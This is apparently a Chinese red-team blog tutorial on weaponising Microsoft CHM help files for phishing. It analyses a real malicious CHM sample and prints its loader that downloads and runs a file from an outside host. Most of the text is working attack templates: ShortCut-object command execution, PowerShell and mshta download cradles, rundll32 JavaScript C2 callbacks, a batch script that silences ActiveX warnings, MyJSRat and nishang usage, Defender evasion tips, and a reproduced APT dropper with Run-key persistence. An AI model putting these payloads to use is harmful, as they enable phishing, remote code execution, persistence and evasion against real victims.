【钓鱼从入门到放弃】-CHM文件笔记

关于CHM文件的学习。

0x00 简介

微软HTML帮助集，即编译的HTML帮助文件（英语：Microsoft Compiled HTML Help, CHM），是微软继承早先的WinHelp发展的一种文件格式，用来提供在线帮助，是一种应用较广泛的文件格式。因为CHM文件如一本书一样，可以提供内容目录、索引和搜索等功能。CHM帮助文件通常可以使用RAR等压缩文件格式打开。

当攻击者利用此文件进行攻击时，通常会在CHM文件内包含恶意脚本和恶意文件，用户打开CHM文件时就会触发恶意代码执行。nishang等框架支持生成CHM的恶意恶意利用。本文介绍了如何手动制作CHM，并梳理了常见的攻击利用方式。

0x01 前置知识

需要下载HTML Help Workshop生成CHM文件，但是微软官方的链接已经失效了。

下载链接：https://www.helpandmanual.com/downloads_mscomp.html

$ shasum -a 256 ~/Downloads/htmlhelp.exe
cf8fe5a02d3c2bf0c8728dd399dc3b2587c4139ffb23ef4268f34535a6157b87  ~/Downloads/htmlhelp.exe

由于是第三方网站，所以这里贴出virustotal检测的链接：https://www.virustotal.com/gui/file/cf8fe5a02d3c2bf0c8728dd399dc3b2587c4139ffb23ef4268f34535a6157b87/detection

安装之后会提示已经有最新的HTML HELP版本了，那个可以忽略不管。

CHM文件是由hhp、html、hhk、hhc以及其他资源文件（如jpeg、png）等文件组成的。

hhp-配置文件

hhp文件是在编译时用到的主要文件。可以将它理解为CHM的配置文件，里面包含了首页和默认页、要打包的文件等信息。

Example

[OPTIONS] 
Compatibility=1.1 or later
Compiled file=PocCalc.chm                 
Contents file=Table of Contents.hhc       
Index file=Index.hhk                      
Default topic=poc.html                    
Title=PocCalc                             
Display compile progress=No
Language=0x410 Italian (Italy)
Full-text search=Yes                

[FILES] 
poc.html                                  
Test7Z1.exe

[INFOTYPES]

html

HTML格式文件用来存储CHM帮助文件中的文本、图片、 按钮、以及快捷方式等方式。

攻击者一般会通过ShortCut的方式添加执行的恶意命令，在Item1的Value参数中指定运行的进程和参数。

ShortCut-Syntax

<PARAM  name="Command" value="ShortCut">
<PARAM  name="Item1"   value=",<i>program name</i>,<i>parameters</i>">
<PARAM  name="Item2"   value="<i>message ID</i>,<i>wPARAM</i>,<i>lPARAM</i>">
[<PARAM name="Button"  value="[Text: <i>Button text</i>|Bitmap: <i>Bitmap file path</i>|Icon:<i>Icon file path</i>]">]
[<PARAM name="Font"    value="<i>Facename[, point size[, charset[, color[, PLAIN BOLD ITALIC UNDERLINE]]]]</i>">]
[<PARAM name="Text"    value="Text: <i>Link text</i>">]

ShortCut-Example

利用hhctrl.ocx对象命令执行去弹CMD-代码示例。

<!DOCTYPE html>
<html>
	<head>
		<title>calc poc</title>
		<head></head>
	<body>
	command exec
	<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
	<PARAM name="Command" value="ShortCut">
	<PARAM name="Button" value="Bitmap::shortcut">
	<PARAM name="Item1" value=',cmd /c, Calc'>
	<PARAM name="Item2" value="273,1,1">
	</OBJECT>
	<SCRIPT>x.Click();</SCRIPT>

	</body>
	
</html>

hhk-索引页面地图

hhk文件是html格式的文件，用于保存CHM中关键字索引目录的内容， 在<BODY>标签中以列举所有需要嵌入到chm文件中的附件文件对象，对象包含对象名Name和编译对象所在路径Local两个参数，设置的对象会在编译的时候编译到chm文件中。该文件在编译CHM文件过程中可忽略。

Example

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML> 
   <HEAD> 
   <meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1">
   <!-- Sitemap 1.0 --> 
   </HEAD>
   <BODY> 
   <UL> 
   <LI><OBJECT type="text/sitemap">
       <param name="Name" value="Hello">
       <param name="Local" value="poc.html">
       </OBJECT> 
   <LI><OBJECT type="text/sitemap">
       <param name="Name" value="World">
       <param name="Local" value="poc.html">
       </OBJECT>
   </UL>
   </BODY>
</HTML>

hhc-目录页面地图

hhc文件是html格式的文件，用于保存CHM中目录页面索引的内容，在hhc文件中，用<UL>和<LI>两个标签定义了带有层级关系中列表,并在其中以<OBJECT>的形式嵌入了html页面对象。利用列表的层级关系，构造了最终chm文件的层级关系。

Example

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"> 
<HTML> 
    <HEAD> 
        <meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1"> 
        <!-- Sitemap 1.0 --> 
    </HEAD> 
    <BODY> 
        <OBJECT type="text/site properties">
            <param name="ImageType" value="Folder">
        </OBJECT> 
        <UL>
            <LI> <OBJECT type="text/sitemap">
                <param name="Name" value="Test">
                <param name="Local" value="poc.html">
                <param name="ImageNumber" value="1">
                </OBJECT>
         </UL>
     </BODY>
</HTML>

编译CHM文件

使用hhc.exe 编译hhp文件即可。

hhc.exe <目标hhp文件>

反编译CHM文件

hh.exe  -decompile <输出路径> <目标chm文件>

0x02 真实案例分析

在吾爱论坛上找到一个恶意样本，该恶意程序执行后会释放BAT文件并执行、一个CHM文件。（原样本是COM程序，这里只简单分析一下CHM文件）

这里用自带的hh.exe反编译就能获取到文件，看看反编译出来的文件就知道，这个CHM文件是用Easy CHM打包的。

看看hhk索引，没啥特别，hhc文件和这个差不多。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="EasyCHM.exe  www.zipghost.com">
<!-- Sitemap 1.0 -->
</HEAD><BODY>
<UL>
	<LI> <OBJECT type="text/sitemap">
		<param name="Name" value="1.html">
		<param name="Local" value="1.html">
		</OBJECT>
	<LI> <OBJECT type="text/sitemap">
		<param name="Name" value="2.html">
		<param name="Local" value="2.html">
		</OBJECT>
</UL>
</BODY></HTML>

1.html（主要恶意文件）

<!DOCTYPE html>
<html lang="en">

</html>

<script>
    (function() {
        if (window.atob)
            return;
        else {
            var Base64 = window.Base64 || {
                /*省略部分代码，此处代码为base64的编码解码实现，猜测是为了掩人耳目*/
    })();
 
    function debug(s) {
        if(window.console)console.log(s);
    }

var dotnet4 = function(path, execuablePath, downloadPath) {
		/* dotnet4 这一块函数是用了这个DotNetToJScript工具，通过反序列化加载执行.NET程序，代码基本相同*/
    /* 仓库的测试程序是弹窗，不过这里攻击者应该是重写了入口函数，使其能够下载恶意文件并执行，由于请求的url已经关站，故无法对下载的文件进行下一步分析*/

    var invokeSuccess = false;

    function setversion() {
        new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v2.0.50727';
    }

    function base64ToStream(b) {
        var enc = new ActiveXObject("System.Text.ASCIIEncoding");
        var length = enc.GetByteCount_2(b);
        var ba = enc.GetBytes_4(b);
        var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
        ba = transform.TransformFinalBlock(ba, 0, length);
        var ms = new ActiveXObject("System.IO.MemoryStream");
        ms.Write(ba, 0, (length / 4) * 3);
        ms.Position = 0;
        return ms;
    }

	//（此处省略了部分。）
	var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
    "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
    "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
    "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
    "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
    "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
    "AAAAAAAAAAAAAAAAAQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rp"+
    "b24uQXNzZW1ibHkgTG9hZChCeXRlW10pCAAAAAoL";
    var entry_class = 'TestClass';

    try {
        setversion();
        var stm = base64ToStream(serialized_obj);
        var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
        var al = new ActiveXObject('System.Collections.ArrayList');
        var d = fmt.Deserialize_2(stm);
        al.Add(undefined);
        var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
        o.Cp(path, execuablePath, downloadPath);
        invokeSuccess = true;
    } catch (e) {
        debug(e.message);
    }
    return invokeSuccess;
}
var href = "";

// setTimeout(, 0);
window.path = "http://www.dgf6.cn:7231/105";
window.execuablePath = "11";
window.downloadPath = "C:\\Users\\Public\\6253";

//请求 http[:]//www.dgf6.cn:7231/105，下载恶意文件，释放到C:\\Users\\Public\\6253，执行后跳转2.html页面
(function task() {
    try {
        var path = window.path;
        var execuablePath = window.execuablePath;
        var downloadPath = window.downloadPath;
        var isSuccessv4 = "";
        var isSuccessv2 = "";
        isSuccessv4 = dotnet4(path, execuablePath, downloadPath);
   
        if (isSuccessv4) {
            location.href = "2.html"
        } else {}
    } catch (e) {
        debug(e.message + "globalCode");
    }
})();
</script>

2.html 就一张图片，没什么好说的。

<img style="position:absolute; top:0px;left:0px; width:100%" src="http://img.youxiguancha.com/game/2015/01/12/1421043095_5.jpg"/>

该恶意程序执行流程如下：

0x03 基础攻击方式

利用hhctrl.ocx对象命令执行

其实这里方法用的都是ShortCut这个功能，去实现的命令执行。

powershell

这里用的是MSF生成的payload，当然也可以直接用cs的，但是缺点是会弹个powershell执行的框。

<!DOCTYPE html>
<html>
	<head>
		<title>calc poc</title>
		<head></head>
	<body>
	command exec
	<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
	<PARAM name="Command" value="ShortCut">
	<PARAM name="Button" value="Bitmap::shortcut">
	<PARAM name="Item1" value=',powershell.exe, -nop -w hidden -e BASE64编码的字段'>
 <!--><PARAM name="Item1" value=',powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring("http://xx.xx.xx.xx"))'> 这段payload也可以<-->
	<PARAM name="Item2" value="273,1,1">
	</OBJECT>
	<SCRIPT>x.Click();</SCRIPT>
	</body>
	
</html>

hta

通过shortcut调用远程hta文件，实现上线。

<!DOCTYPE html>
<html>
	<head>
		<title>calc poc</title>
		<head></head>
	<body>
	command exec
	<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
	<PARAM name="Command" value="ShortCut">
	<PARAM name="Button" value="Bitmap::shortcut">
	<PARAM name="Item1" value=',mshta, http://x.x.x.x/loader.hta'>
	<PARAM name="Item2" value="273,1,1">
	</OBJECT>
	<SCRIPT>x.Click();</SCRIPT>
	</body>
	
</html>

rundll32运行JS

通过rundll32执行带ActiveXObject的javascript脚本实现上线。

<!DOCTYPE html>
<html>
	<head>
		<title>calc poc</title>
		<head></head>
	<body>
	command exec
	<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
	<PARAM name="Command" value="ShortCut">
	<PARAM name="Button" value="Bitmap::shortcut">
	<PARAM name="Item1" value=',rundll32.exe, javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://xx.xx.xx.xx",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}>
	<PARAM name="Item2" value="273,1,1">
	</OBJECT>
	<SCRIPT>x.Click();</SCRIPT>
	</body>
	
</html>

释放文件并执行

以下代码示范了如何通过shortcut调用cmd命令，将CHM压缩的文件释放到本地指定目录后，再执行。

hh释放文件Example

<p id="t0">Hello World!</p>
<SCRIPT>
function getPath(){ 
    var pathName = document.location.pathname;
    var index0 = pathName.substr(1).indexOf(":");
    var index1 = pathName.substr(1).lastIndexOf(":");
    var result = pathName.substr(index0+2,index1-index0-2);
    return result; 
}

var dir = getPath();

var commodStr = '<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>' + '<PARAM name="Command" value="ShortCut">' + '<PARAM name="Button" value="Bitmap::shortcut">' + '<PARAM name="Item1" value=",hh, -decompile C:\\Windows\\Temp\\Downloads\\ ' + dir + '">';
document.getElementById('t0').innerHTML = commodStr;  
x.Click();
</SCRIPT>

利用ActiveXObject对象判断文件是否存在，存在就打开。缺点，会提示ActiveXObject运行警告。

<p id="t0">Hello World!</p>
<SCRIPT>
<!-->获取目录<-->
function getPath(){ 
    var pathName = document.location.pathname;
    var index0 = pathName.substr(1).indexOf(":");
    var index1 = pathName.substr(1).lastIndexOf(":");
    var result = pathName.substr(index0+2,index1-index0-2);
    return result; 
}

<!-->判断文件是否存在，存在就执行指定的文件。<-->
function isHasFile(){
	var a,s='C:\\Windows\\Temp\\Downloads\\Test7Z1.exe';
	a = new ActiveXObject("Scripting.FileSystemObject");
	if(a.FileExists(s))
		AUTO.Click();
}

var dir = getPath();

var commodStr = '<OBJECT id=unrar classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>' + '<PARAM name="Command" value="ShortCut">' + '<PARAM name="Button" value="Bitmap::shortcut">' + '<PARAM name="Item1" value=",hh, -decompile C:\\Windows\\Temp\\Downloads\\ ' + dir + '"></OBJECT><OBJECT id=AUTO classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=",C:\\Windows\\Temp\\Downloads\\Test7Z1.exe"><PARAM name="Item2" value="273,1,1"></OBJECT>';

document.getElementById('t0').innerHTML = commodStr;  
unrar.Click();
isHasFile();

</SCRIPT>

ActiveXObject

缺点，会提示是否运行ActiveXObject运行警告，但是可以通过修改注册表去关闭警告。

<html>
<script type="text/vbscript">
Function test()
	Dim oShell
	Set oShell = CreateObject("WSCript.shell")
	oShell.run "cmd /c calc"
	Set oShell = Nothing
End Function
test()
</script>

</html>

注册表关闭ActiveXObject提示的Bat脚本

执行该bat脚本将会关闭文件包含ActiveXObject脚本的警告。

echo off

cls
set bl=0
:setreg
if "%bl%"=="5" goto ex

set regpath=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%bl%
cls

@reg add "%regpath%" /v "1201" /d "0" /t REG_DWORD /f

set /a bl=%bl%+1

:ex
exit

0x04 工具利用

NISHANG Out-CHM

仓库地址：https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1

CS或者MSF开启托管powershell恶意脚本。

Import-Module .\Out-CHM.ps1

Out-CHM -PayloadURL http://xx.xx.xx.xx/ -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

会在当前文件夹下生成doc.chm文件，执行后能正常上线，但是有黑窗弹出，客户端有察觉，不太合适。

MyJSRat

该方式利用的是rundll32 加载恶意javascript脚本来实现的连接，可以实现不弹黑窗上线CS，客户端全程无异常。

仓库地址：https://github.com/Ridter/MyJSRat

利用方式很简单

python2 MyJsrat.py -i <LHOST> -p <LPORT>

访问http://IP:PORT/wtf获取受害机连接命令

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://172.16.1.86:1234/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

将命令写入CHM的html文件中

<!DOCTYPE html>
<html>
	<head>
		<title>calc poc</title>
		<head></head>
	<body>
	command exec
	<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
	<PARAM name="Command" value="ShortCut">
	<PARAM name="Button" value="Bitmap::shortcut">
	<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://172.16.1.86:1234/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
	<PARAM name="Item2" value="273,1,1">
	</OBJECT>
	<SCRIPT>x.Click();</SCRIPT>
	</body>
	
</html>

使用CS托管powershell恶意脚本。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://HOST:80/a'))"

因为有特殊字符，所以要对执行的命令进行base64编码。将双引号包裹的powershell代码内容复制到txt中。

使用命令进行编码

cat 2.txt|iconv --to-code UTF-16LE |base64

# 要执行的powershell命令如下
powershell.exe -ep bypass -enc <base64编码内容>

使用MyJSRAT执行反弹shell的powershell命令，使受害机器上线。

python2 MyJSRat.py -i 172.16.1.86 -p 1234 -c "powershell.exe -ep bypass -enc <base64编码内容>"

开启MyJSRAT服务端后，只要打开CHM文件，客户端全程无弹窗上线CS。

DotNetToJScript

仓库地址：https://github.com/tyranid/DotNetToJScript

其实也是和MyJSRAT方法一样，通过rundll32.exe加载ActiveXObject Javascript脚本区别在于DotNetToJScript利用Javascript代码反序列加载Net程序（其实都会用到ActiveXObject），Net程序这里我们就可以发挥自己的聪明才智，随便写点想写的东西都行。仓库的测试TestClass是弹一个消息窗口。这里我写了一个C Sharp的Shellcode Loader，这里我复用了默认的入口函数。

使用DotNetToJScript生成Javascript脚本，除了Javascript脚本外，还能生成vbs、vba脚本。但是估计都被厂商杀烂了把。

DotNetToJScript.exe -v v2 -o test1.js ExampleAssembly.dll

这里生成之后可以手动运行JS文件，看是否能正常上线，能正常上线就说明成功。

我这里是把生成后的javascript代码，嵌入了CHM文件的html源码中，缺点是打开后需要快速迁移进程。

混淆一下Javascript代码，效果不错，使用CS 4.3默认Profile都能过Windows Defender（前提是不sleep 1）。所以我猜测如果修改CS Profile，用https监听+自签证书搞不好能无压力过了。

0x05 “蔓灵花”组织CHM利用方法复现

分析报告地址：https://mp.weixin.qq.com/s/NLe4JqmjiB58IQ5Kn6DSLQ

这里仅复现报告中CHM文件的执行流程，CHM执行流程如图所示。

演示用的二进制程序为自己编写的net程序，通过带外dns，发送主机名/用户名、IP信息。

完整代码如下：

<!DOCTYPE html>
<html>
	<head>
		<title>hello world</title>
		<head></head>
	<body>
	
	<img style="position:absolute; top:0px;left:0px; width:100%" src="https://images.atsud0.me/images/background.jpg"/>

	<bgsound src="ntest.exe"><OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

	<PARAM name="Command" value="ShortCut">

	<PARAM name="Button" value="Bitmap::shortcut">

	<PARAM name="Item1" value=',rundll32.exe,vbscript:&quot;\..\mshtml,,,RunHTMLApplication &quot;<br>execute("Set fso=CreateObject(""Scripting.FileSystemobject""):appdata=(CreateObject(""Wscript.Shell"")).ExpandEnvironmentstrings(""%APPDATA%"")&""\ctfmon.exe"":Set fc=fso.GetFolder(fso.GetSpecialFolder(2)).files:For Each f1 in fc:If f1.size=7168 then : fso.CopyFile f1, appdata:Exit For:End If:Next:window.close()")'>

	</OBJECT>

	<OBJECT id=y classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

	<PARAM name="Command" value="ShortCut">

	<PARAM name="Button" value="Bitmap::shortcut">

	<PARAM name="Item1" value=',rundll32.exe,vbscript:&quot;\..\mshtml,,,RunHTMLApplication &quot;<br>execute("Set wss=CreateObject(""WScript.Shell""):path=wss.ExpandEnvironmentStrings(""%APPDATA%"")&""\ctfmon.exe"":wss.RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ctfmonitor"", path,""REG_SZ"":window.close()")'>

	</OBJECT>

	<OBJECT id=z classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

	<PARAM name="Command" value="ShortCut">

	<PARAM name="Button" value="Bitmap::shortcut">

	<PARAM name="Item1" value=',rundll32.exe,vbscript:&quot;\..\mshtml,,,RunHTMLApplication &quot;<br>execute("Set sfso=CreateObject(""Scripting.FileSystemobject""):Set wsc=CreateObject(""WScript.Shell""):peaddr=wsc.ExpandEnvironmentstrings(""%APPDATA%"")&""\ctfmon.exe"":Set QQ=createobject(""Shell.Application""):For i=1 to 1000:If sfso.fileexists(peaddr) then:QQ.ShellExecute peaddr:Exit For:End If:document.write():Next:window.close()")'>

	</OBJECT>

	<script>x.Click();y.Click();z.Click();</script>

	</body>
	
</html>

设置内嵌的ntest.exe为背景音乐，按钮x主要通过rundll32.exe调用RunHTMLApplication，遍历内嵌文件中的文件大小为7168kb的文件，将其释放到%APPDATA%目录下，并重命名为ctfmon.exe。

<bgsound src="ntest.exe"><OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

	<PARAM name="Command" value="ShortCut">

	<PARAM name="Button" value="Bitmap::shortcut">

	<PARAM name="Item1" value=',rundll32.exe,vbscript:&quot;\..\mshtml,,,RunHTMLApplication &quot;<br>execute("Set fso=CreateObject(""Scripting.FileSystemobject""):appdata=(CreateObject(""Wscript.Shell"")).ExpandEnvironmentstrings(""%APPDATA%"")&""\ctfmon.exe"":Set fc=fso.GetFolder(fso.GetSpecialFolder(2)).files:For Each f1 in fc:If f1.size=7168 then : fso.CopyFile f1, appdata:Exit For:End If:Next:window.close()")'>

	</OBJECT>

按钮y，将ctfmon.exe文件写入注册表开机启动项中。

<OBJECT id=y classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

	<PARAM name="Command" value="ShortCut">

	<PARAM name="Button" value="Bitmap::shortcut">

	<PARAM name="Item1" value=',rundll32.exe,vbscript:&quot;\..\mshtml,,,RunHTMLApplication &quot;<br>execute("Set wss=CreateObject(""WScript.Shell""):path=wss.ExpandEnvironmentStrings(""%APPDATA%"")&""\ctfmon.exe"":wss.RegWrite ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ctfmonitor"", path,""REG_SZ"":window.close()")'>

	</OBJECT>

按钮z，文件存在时执行ctfmon.exe。

<OBJECT id=z classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

	<PARAM name="Command" value="ShortCut">

	<PARAM name="Button" value="Bitmap::shortcut">

	<PARAM name="Item1" value=',rundll32.exe,vbscript:&quot;\..\mshtml,,,RunHTMLApplication &quot;<br>execute("Set sfso=CreateObject(""Scripting.FileSystemobject""):Set wsc=CreateObject(""WScript.Shell""):peaddr=wsc.ExpandEnvironmentstrings(""%APPDATA%"")&""\ctfmon.exe"":Set QQ=createobject(""Shell.Application""):For i=1 to 1000:If sfso.fileexists(peaddr) then:QQ.ShellExecute peaddr:Exit For:End If:document.write():Next:window.close()")'>

	</OBJECT>

依次执行按钮x、按钮y、按钮z。

<script>x.Click();y.Click();z.Click();</script>

0x06 小结

本文介绍了CHM文件的组成，编译CHM文件以及反编译CHM文件。并简单介绍CHM文件通过ShortCut按钮进行恶意代码的执行，以及介绍了三个工具利用CHM文件上线C2。该文件较常被“蔓灵花组织”所利用进行钓鱼攻击。故认为有学习价值，可以扩展钓鱼方式。

0x07 参考资料

• https://mp.weixin.qq.com/s/OdCrUOsVAscqOjWaq2w8hQ
• https://www.freebuf.com/articles/web/286340.html
• https://evi1cg.me/archives/chm_backdoor.html
• https://www.cnblogs.com/SunsetR/p/12620562.html
• https://docs.microsoft.com/en-us/previous-versions/windows/desktop/htmlhelp/shortcut
• https://documentation.help/chm-example/shortcut_link.htm
• https://www.freebuf.com/articles/network/195373.html
• https://mp.weixin.qq.com/s/NLe4JqmjiB58IQ5Kn6DSLQ